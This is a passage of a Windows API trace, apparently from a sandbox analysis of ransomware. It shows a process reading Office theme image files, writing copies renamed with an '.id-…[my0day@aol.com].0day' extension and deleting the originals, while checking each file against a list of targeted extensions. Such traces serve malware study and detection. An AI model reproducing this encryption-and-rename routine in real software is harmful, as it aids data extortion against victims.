lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.461] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0043.464] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=2181) returned 1 [0043.464] CloseHandle (hObject=0x1d8) returned 1 [0043.464] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif")) returned 0x20 [0043.464] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.464] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0043.464] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.464] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.464] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0043.468] GetLastError () returned 0x0 [0043.468] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x885, lpOverlapped=0x0) returned 1 [0043.477] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x890, lpOverlapped=0x0) returned 1 [0043.478] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.478] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.478] SetEndOfFile (hFile=0x198) returned 1 [0043.478] CloseHandle (hObject=0x198) returned 1 [0043.478] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.478] SetEndOfFile (hFile=0x1d8) returned 1 [0043.479] CloseHandle (hObject=0x1d8) returned 1 [0043.479] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0043.479] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif")) returned 1 [0043.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.480] lstrlenW (lpString=".doc") returned 4 [0043.480] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.480] lstrlenW (lpString=".docx") returned 5 [0043.480] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.480] lstrlenW (lpString=".pdf") returned 4 [0043.480] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.480] lstrlenW (lpString=".xls") returned 4 [0043.480] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.480] lstrlenW (lpString=".xlsx") returned 5 [0043.480] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.480] lstrlenW (lpString=".ppt") returned 4 [0043.480] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.480] lstrlenW (lpString=".zip") returned 4 [0043.480] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.480] lstrlenW (lpString=".rar") returned 4 [0043.480] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.480] lstrlenW (lpString=".bz2") returned 4 [0043.480] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.480] lstrlenW (lpString=".7z") returned 3 [0043.480] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.480] lstrlenW (lpString=".dbf") returned 4 [0043.480] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.480] lstrlenW (lpString=".1cd") returned 4 [0043.480] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.480] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.480] lstrlenW (lpString=".jpg") returned 4 [0043.480] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.481] lstrlenW (lpString=".doc") returned 4 [0043.481] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.481] lstrlenW (lpString=".docx") returned 5 [0043.481] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.481] lstrlenW (lpString=".pdf") returned 4 [0043.481] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.481] lstrlenW (lpString=".xls") returned 4 [0043.481] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.481] lstrlenW (lpString=".xlsx") returned 5 [0043.481] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.481] lstrlenW (lpString=".ppt") returned 4 [0043.481] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.481] lstrlenW (lpString=".zip") returned 4 [0043.481] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.481] lstrlenW (lpString=".rar") returned 4 [0043.481] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.481] lstrlenW (lpString=".bz2") returned 4 [0043.481] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.481] lstrlenW (lpString=".7z") returned 3 [0043.481] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.481] lstrlenW (lpString=".dbf") returned 4 [0043.481] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.481] lstrlenW (lpString=".1cd") returned 4 [0043.481] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.481] lstrlenW (lpString=".jpg") returned 4 [0043.481] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.481] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0043.482] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.482] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0043.482] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=20627) returned 1 [0043.482] CloseHandle (hObject=0x1d8) returned 1 [0043.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png")) returned 0x20 [0043.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.482] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0043.482] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.482] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.482] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0043.482] GetLastError () returned 0x0 [0043.482] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x5093, lpOverlapped=0x0) returned 1 [0043.492] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x50a0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x50a0, lpOverlapped=0x0) returned 1 [0043.493] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.493] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.493] SetEndOfFile (hFile=0x198) returned 1 [0043.493] CloseHandle (hObject=0x198) returned 1 [0043.493] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.493] SetEndOfFile (hFile=0x1d8) returned 1 [0043.494] CloseHandle (hObject=0x1d8) returned 1 [0043.494] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0043.494] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png")) returned 1 [0043.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.494] lstrlenW (lpString=".doc") returned 4 [0043.494] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.494] lstrlenW (lpString=".docx") returned 5 [0043.494] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.494] lstrlenW (lpString=".pdf") returned 4 [0043.494] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.494] lstrlenW (lpString=".xls") returned 4 [0043.494] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.494] lstrlenW (lpString=".xlsx") returned 5 [0043.494] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.494] lstrlenW (lpString=".ppt") returned 4 [0043.495] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.495] lstrlenW (lpString=".zip") returned 4 [0043.495] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.495] lstrlenW (lpString=".rar") returned 4 [0043.495] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.495] lstrlenW (lpString=".bz2") returned 4 [0043.495] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.495] lstrlenW (lpString=".7z") returned 3 [0043.495] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.495] lstrlenW (lpString=".dbf") returned 4 [0043.495] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.495] lstrlenW (lpString=".1cd") returned 4 [0043.495] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.495] lstrlenW (lpString=".jpg") returned 4 [0043.495] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.495] lstrlenW (lpString=".doc") returned 4 [0043.495] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.495] lstrlenW (lpString=".docx") returned 5 [0043.495] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.495] lstrlenW (lpString=".pdf") returned 4 [0043.495] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.495] lstrlenW (lpString=".xls") returned 4 [0043.495] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.495] lstrlenW (lpString=".xlsx") returned 5 [0043.495] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.495] lstrlenW (lpString=".ppt") returned 4 [0043.495] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.496] lstrlenW (lpString=".zip") returned 4 [0043.496] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.496] lstrlenW (lpString=".rar") returned 4 [0043.496] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.496] lstrlenW (lpString=".bz2") returned 4 [0043.496] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.496] lstrlenW (lpString=".7z") returned 3 [0043.496] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.496] lstrlenW (lpString=".dbf") returned 4 [0043.496] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.496] lstrlenW (lpString=".1cd") returned 4 [0043.496] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.496] lstrlenW (lpString=".jpg") returned 4 [0043.496] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.496] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0043.496] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.496] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0043.496] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1560) returned 1 [0043.497] CloseHandle (hObject=0x1d8) returned 1 [0043.497] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif")) returned 0x20 [0043.497] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.497] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0043.497] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.497] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.497] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0043.498] GetLastError () returned 0x0 [0043.498] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x618, lpOverlapped=0x0) returned 1 [0043.501] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x620, lpOverlapped=0x0) returned 1 [0043.502] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.502] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.502] SetEndOfFile (hFile=0x198) returned 1 [0043.502] CloseHandle (hObject=0x198) returned 1 [0043.502] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.502] SetEndOfFile (hFile=0x1d8) returned 1 [0043.503] CloseHandle (hObject=0x1d8) returned 1 [0043.503] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0043.503] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif")) returned 1 [0043.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.503] lstrlenW (lpString=".doc") returned 4 [0043.503] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.503] lstrlenW (lpString=".docx") returned 5 [0043.503] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.503] lstrlenW (lpString=".pdf") returned 4 [0043.503] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.503] lstrlenW (lpString=".xls") returned 4 [0043.503] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.503] lstrlenW (lpString=".xlsx") returned 5 [0043.503] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.503] lstrlenW (lpString=".ppt") returned 4 [0043.503] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.504] lstrlenW (lpString=".zip") returned 4 [0043.504] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.504] lstrlenW (lpString=".rar") returned 4 [0043.504] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.504] lstrlenW (lpString=".bz2") returned 4 [0043.504] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.504] lstrlenW (lpString=".7z") returned 3 [0043.504] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.504] lstrlenW (lpString=".dbf") returned 4 [0043.504] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.504] lstrlenW (lpString=".1cd") returned 4 [0043.504] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.504] lstrlenW (lpString=".jpg") returned 4 [0043.504] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.504] lstrlenW (lpString=".doc") returned 4 [0043.504] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.504] lstrlenW (lpString=".docx") returned 5 [0043.504] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.504] lstrlenW (lpString=".pdf") returned 4 [0043.504] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.504] lstrlenW (lpString=".xls") returned 4 [0043.504] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.504] lstrlenW (lpString=".xlsx") returned 5 [0043.504] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.504] lstrlenW (lpString=".ppt") returned 4 [0043.504] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.504] lstrlenW (lpString=".zip") returned 4 [0043.504] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.505] lstrlenW (lpString=".rar") returned 4 [0043.505] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.505] lstrlenW (lpString=".bz2") returned 4 [0043.505] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.505] lstrlenW (lpString=".7z") returned 3 [0043.505] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.505] lstrlenW (lpString=".dbf") returned 4 [0043.505] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.505] lstrlenW (lpString=".1cd") returned 4 [0043.505] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0043.505] lstrlenW (lpString=".jpg") returned 4 [0043.505] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.505] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0043.505] 